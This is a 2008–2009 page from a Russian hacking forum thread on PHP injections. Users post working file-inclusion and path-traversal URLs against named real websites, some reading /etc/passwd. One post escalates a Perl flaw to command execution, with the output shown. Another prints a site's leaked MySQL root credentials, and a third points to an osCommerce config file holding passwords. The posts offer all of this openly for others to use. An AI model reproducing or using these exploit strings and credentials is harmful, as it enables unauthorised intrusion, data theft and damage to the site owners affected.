HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу PHP Иньекции
   
Ответ
Страница 80 из 143 « Первая < 3070 76 77 78 79 80 81 82 83 84 90130 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

Юзайте кто хотите
  #1  
Старый 28.12.2008, 02:34
The matrix
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345

Репутация: 573
По умолчанию Юзайте кто хотите
1)
Код:
http://www.veryhealthylife.com/page.php?url=../../../../../../../../../../etc/passwd
2)
Код:
http://jirisubrt.com/page.php?url=page.php
открываем сами себя и смотрим в сурцах.
PHP код:
<?$file=fopen ($url"r");
      FPassThru ($file);
    ?>
по сути стандартная читалка
3)
Код:
http://www.cpm5000.com/cmnt/download.php?url=../../../../../../../../../etc/passwd&filename=fuck
сохраняем потом открываем и любуемся
 
Ответить с цитированием

  #2  
Старый 28.12.2008, 06:45
-=Razor=-
Новичок
Регистрация: 20.12.2008
Сообщений: 24
Провел на форуме:
1187799

Репутация: 62
По умолчанию
Цитата:
http://avatarcollectors.awardspace.com/index.php?id=../../../etc/passwd
вот)
 
Ответить с цитированием

  #3  
Старый 14.01.2009, 09:50
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
По умолчанию
Цитата:
http://www.skiensnett.com/index.php?page=../etc/passwd%00
Цитата:
http://faeetam.com.br/process.php?page=process.php%00&id=28&target=block Right
Цитата:
http://gtpl-sida.org/index.php?page=formulaire_contact.php%00&idmenu=32 &idsmenu=56
мне понравились инклуды) так что проверте и направте меня на правильный путь )
Цитата:
http://alazraq.com/parts/show.php?page=../index.php%00
Цитата:
http://www.dairyriver.com/index.php?page=../../index.php
Цитата:
http://www.solomilan.com/index.php?page=../indexphp%00
Последний раз редактировалось sabe; 14.01.2009 в 11:10..
 
Ответить с цитированием

От миня
  #4  
Старый 24.01.2009, 01:49
The matrix
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345

Репутация: 573
По умолчанию От миня
Код:
http://fleaket.com/index.pl?page=../../../../../../../etc/passwd
читаем passwd

Резуляьтат Смотрим в сурсах
 
Ответить с цитированием

  #5  
Старый 30.01.2009, 00:40
The matrix
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345

Репутация: 573
По умолчанию
Цитата:
Сообщение от The matrix  
Код:
http://fleaket.com/index.pl?page=../../../../../../../etc/passwd
читаем passwd

Резуляьтат Смотрим в сурсах
Прошу прощения... Тут можно без проблем все до конца дрвести(до выполнеия кода), уж так решил, посмотреть и довести до ума то, что не довел раньше.
Движлан на перле
читаем index.pl
Код:
http://fleaket.com/index.pl?page=index.pl
из содержания можно понять.

Его болезнь
Код:
if (open(PAGE, $page))
стоит проверка на наличие файла.
Стандартная связка |id| не прокатит
Там еще есть один момент, но слишком в подробности вдаваться не буду сразу к делу. Эксплуатируется баг следующим образом.
Код:
http://fleaket.com/index.pl?page=/|id|
]
просто получаем выполнение кода.
uid=48(apache) gid=48(apache) groups=48(apache)

Код:
http://fleaket.com/index.pl?page=/|which%20wget|
/usr/bin/wget

Вроди как робит вгет, кому надо забирайте.

Еще из исходника понял, что продукт называется
PhoneBox
 
Ответить с цитированием

  #6  
Старый 24.01.2009, 23:03
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Код:
http://www.legalgroup.ru/tmp.php?mf=../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
 
Ответить с цитированием

  #7  
Старый 25.01.2009, 01:27
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
Цитата:
www.chcns.us/display.php?folder=enrollment&file=../../../../../../../etc/passwd
случайно нашел, когда ковырял скули)) не крутил - так что грызите =)
 
Ответить с цитированием

  #8  
Старый 26.01.2009, 03:51
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
По умолчанию
Mil.ru
Министерство обороны Российской Федерации
Цитата:
http://www.mil.ru/info/1069/details/index.shtml?id=.%00
тссс))
 
Ответить с цитированием

  #9  
Старый 27.01.2009, 06:06
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Цитата:
http://www.jnvu.edu.in/getappointment.php?file='.base64_encode("../index.php")
параметр нужно в base64 перевести...

данные от мускуля

$host = "localhost";
$username ="root";
$databasename ="dtjnvudb";
$password = "DBManager";
 
Ответить с цитированием

  #10  
Старый 01.02.2009, 20:07
vikseriq
Участник форума
Регистрация: 31.07.2008
Сообщений: 207
Провел на форуме:
299231

Репутация: 107
По умолчанию
уязвимость OsCommerce/вывод файлов.
вот конфиг с паролями отмайскула. кому надо, юзайте )
http://bergfolk.de/buy/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php
таким образом можно и почитать /etc/passwd, но это уже думайте сами )

___
Спс скажи ++!
 
Ответить с цитированием
Ответ
Страница 80 из 143 « Первая < 3070 76 77 78 79 80 81 82 83 84 90130 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PSalm69 Избранное 273 13.02.2016 01:24
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.